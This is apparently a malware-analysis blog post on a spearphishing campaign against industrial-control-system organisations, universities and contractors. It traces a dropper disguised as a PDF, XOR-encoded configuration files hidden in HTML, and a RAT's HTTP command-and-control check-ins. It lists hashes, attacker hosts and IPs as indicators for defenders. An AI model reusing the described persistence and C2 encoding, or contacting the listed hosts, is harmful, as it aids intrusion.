A few days ago, DigitalBond published information about an ongoing spearphishing campaign that affected one of their employees.
The attackers were using a pdf document related to ICS (Industrial Control Systems) security as a lure to compromise potential targets within the ICS community.
After analyzing the initial information provided, my friend Rubén Santamarta from IOActive and I investigated further on the binaries and the involved infrastructure.
Analysis of the malware
As described in this analysis done by the DigitalBond folks, the mail contained a link to a zip file hosted on hxxp://research.digitalvortex.com/
Once uncompressed, the file Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe (c6b95b178188b8c35d14bed40520e685)
The file is a WinRAR SFX archive that will unpack the malware files to the user’s Temp folder as well as showing the benign PDF file Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.
C:DOCUME~1ADMINI~1LOCALS~1Tempspoolsvr.exe (md5: 5ff3269faca4a67d1a4c537154aaad4b)
C:DOCUME~1ADMINI~1LOCALS~1TempLeveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf
The dropped file spoolsvr.exe,
https://www.virustotal.com/file/466bb7da773c7c200f87a8a06f143c6c6856e9ebc4347eb4afb096104bcd97b4/analysis/
The malware also creates a registry key to maintain persistence:
HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionRun
load = C:DOCUME~1ADMINI~1LOCALS~1Tempspoolsvr.exe
The file is a downloader that reads the configuration file from a remote server, in this case:
hxxp://hint.happyforever.com/logo.html
203.231.234.23
203.226.0.0 - 203.231.255.255
KRNIC
Korea Network Information Center
As described in the DigitalBond’s analysis, the html file contains configuration values within the html tags. The config values are encoded with base64 and then XORED with the key 0x42.
In this file, the values are as follow:
download:;sleep:20;
and the body contains a PE File with a new malware.
You can use a small script I created to automatically extract http://alienvault-labs-garage.googlecode.com/files/parse_html_content.py [no longer available] the config values and the binary file from the html content giving the XOR key used. Example:
$ python parse_html_content.py logo.html 42
download:;sleep:20;
tanghl.exe
Binary file logo.html.exe saved
The downloaded file tanghl.exe, is only detected by 3 AV engines:
This file is a RAT (Remote Access Tool) known as Backdoor:Win32/Dalbot.gen
This particulary sample connects to the C&C server 1.234.1.68
1.224.0.0 - 1.255.255.255
SK Broadband Co Ltd
Jung-gu SK NamsanGreen Bldg,Namdaemunno 5(o)-ga, Seoul
The communication between the malware and the C&C is done using HTTP requests to random numeric .asp files . The RAT communication is present on the Cookie header of the request and base64/xor encoded.
GET /8223.asp HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 1.234.1.68
Connection: Keep-Alive
Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWU1pcXlADBBgfBQoGDlYDCgUeDgcORgkIXVtcWVtQ
If we decode the value of the Cookie header (decode base64 and XOR and 1 byte XOR 0x6b) we can see the actual checkin:
command=qwert;clientkey=8175;hostname=XXXXXX;
Further investigations of the campaign
Using the information extracted from the binaries and the servers involved on the attack, we were able to identified more files and campaigns launched by this group during the last months.
The following binary (Romneys_Partner_Choice.exe, md5: 6306364c58f31a711c410c9a874f103c) downloads the config file from:
hxxp://update.slowblog.com/images/logo.png
The server update.slowblog.com was pointing to the same ip as hint.happyforever.com (203.231.234.23) and drops the following benign PDF file, Romneys_Partner_Choice.pdf.
Another file is f77852b73dfde33ea248df7087671f53 that downloads the config file from
httpx://report.rawcomp.com/images/wait.png that also points to 203.231.234.23
and drops China’s_Rare-Earth_Industry.pdf.
Looking for other binaries connecting to the C&C ip address 1.234.1.68 we found the following:
53ae642408aaf6cfed016422b394b32a whose filename is the_list_of_staff_changes_in_anakam.exe
It downloads the config file from
hxxp://report.crabdance.com/report/news.html
210.249.80.141
210.248.0.0 - 210.255.255.255
Japan Network Information Center
The following files were getting the config file from the same server (report.crabdance.com):
MD5 (New_Chertoff_Group_Q1_2012_Report.zip) = e7b5596a08bda3592ed3978ef8d5bcdd
MD5 (Speeches_For_IT-SCC_Meeting.zip) = 094c72273d716302705218eea8b7829e
MD5 (Staff_Changes(URI).zip) = 6725ea60e45b85a63e0dd35f50b50a24
MD5 (Staff_Changes(cmu).zip) = cae33614eb014ed50ab5e1381547bd4a
MD5 (Staff_Changes(purdue).zip) = f108cacaaae8295d9fc602c51bef59cf
MD5 (New_NJVC_First_Half_2012_Report.zip) = 8f26609c275e0262b4833ccc7909779c
dropping the following exes:
MD5 (New NJVC First Half 2012 Report.exe) = f7aa931de0564f77b27c2f5d1d9bc532
MD5 (Any_Staff_Changes_About_Carnegie_Mellon_University.exe) = 8873f6d3ea123708615e72fe357808e5
MD5 (Any_Staff_Changes_About_Purdue_University.exe) = 8873f6d3ea123708615e72fe357808e5
MD5 (Any_Staff_Changes_About_University_of_Rhode_Island.exe) = 8873f6d3ea123708615e72fe357808e5
MD5 (New_Chertoff_Group_Q1_2012_Report.exe) = 59e74b14f5edee8d38eba74a8000fb18
MD5 (Speeches_For_IT-SCC_Meeting.exe) = 59e74b14f5edee8d38eba74a8000fb18
This downloaders obtain the config file from
hxxp://report.crabdance.com/report/news.html
hxxp://203.200.205.245/java/careers.html
hxxp://203.200.205.245/css/style.html
All of them obtain the same RAT and the following C&C ip addresses were present on the binaries:
1.234.1.68:80
143.89.35.7:80
143.89.0.0 - 143.89.255.255
Hong Kong University of Science and Technology
128.175.21.189:80
sql1.be.udel.edu (128.175.21.189)
128.175.0.0 - 128.175.255.255
Information Technologies
192 South Chapel Street
Newark, DE
US
More binaries were found connecting to the ip address 128.175.21.189:
1d8ff16257181562aec3a74ca79ce092 that drops the following doc file:
DRAFT_NEMA_Welcomes_Congressional_Approval_of_Legislation_Directing_DOT_to_Harmonize_with_International_Standards.doc
and gets the config file from release.pornandpot.com (128.175.21.189)
a8b2ac446c614fd5d4880d95369deb3b
hxxp://www.doversolutions.co.in/images/title.png (203.200.205.245)
81848edc70fa647789d78c1610b93135
hxp://203.200.205.245/images/title.png (203.200.205.245)
8e3210d90e728cad7691a4ada11568a0
hxp://203.200.205.245/images/title.png (203.200.205.245)
hxxp://203.200.205.245/images/google.png
hxxp://173.10.48.242/html/WINWORD.gif
hxxp://203.200.205.245/postinfo.html
36fec0bf34b49c09ec8d6cf12205953c
http://203.200.205.245/default.htm
Other files connecting to the C&C server 74.93.92.50:
013649078c6498d27aa37ac8a739b20f
sleep:122;
AcroRd32.exe
download:;
AcroRd32.exe
download:;sleep:20;
tanghl.exe
sleep:240;
Windows.exe
download:;
AcroRd32.exe
sleep:124;
ntdll.exe
sleep:20;
AcroRd32.exe
download:;
WINWORD.EXE
sleep:20;
WINWORD.EXE
Final notes
We have identified that the group behind these attacks is using hacked web servers to host the malicious configuration files. Based on the networks hosting the C&C ips (mainly universities), it is very likely that these servers are also hacked and some kind of proxy is installed on them to redirect the traffic to the real C&C server. This can be easily achieve using HTran or other similar software commonly used by Chinese hacker groups in this kind of campaigns.
If we take a look at the name of the identified files, we can build a short list of likely targets and/or their customers:
- Universities (Carnegie Mellon, Purdue University, Rhode Island)
- ICS related organizations (DigitalBond, NEMA [National Electrical Manufacturers Association])
- Government contractors (NJVC, Chertoff Group)
- Two-Factor Authentication technology (Anakam).
The usage of configuration values inside HTML content is somehow similar to what attackers used during the Operation Shady RAT.
Apart from the modus operandi, we identified the C&C server 74.93.92.50. Based on the information provided on the following links:
http://www.secureworks.com/research/threats/htran/
It seems that ip is somehow related to the group behind the RSA breach.
If you remember, a month ago, the ICS-CERT published a note warning on a series of cyber intrusions targeting natural gas pipeline companies. Some days after that, information about a link between this attacks and the RSA breach was published. “The indicators DHS provided to hunt for the gas-pipeline attackers included several that, when we checked them, turned out to be related to those used by the perpetrators of the RSA attack,” you can read on the article.
One way or another, it seems that ICS companies are beginning to be included in the shopping list of these kind of groups.
You can also use the following OpenIOC file http://alienvault-labs-garage.googlecode.com/files/d3b52fea-5020-469c-97f8-b23bf4954751.ioc [no longer available] that contains the indicators of compromise related to the data presented:
You can find more information at IOActive blog
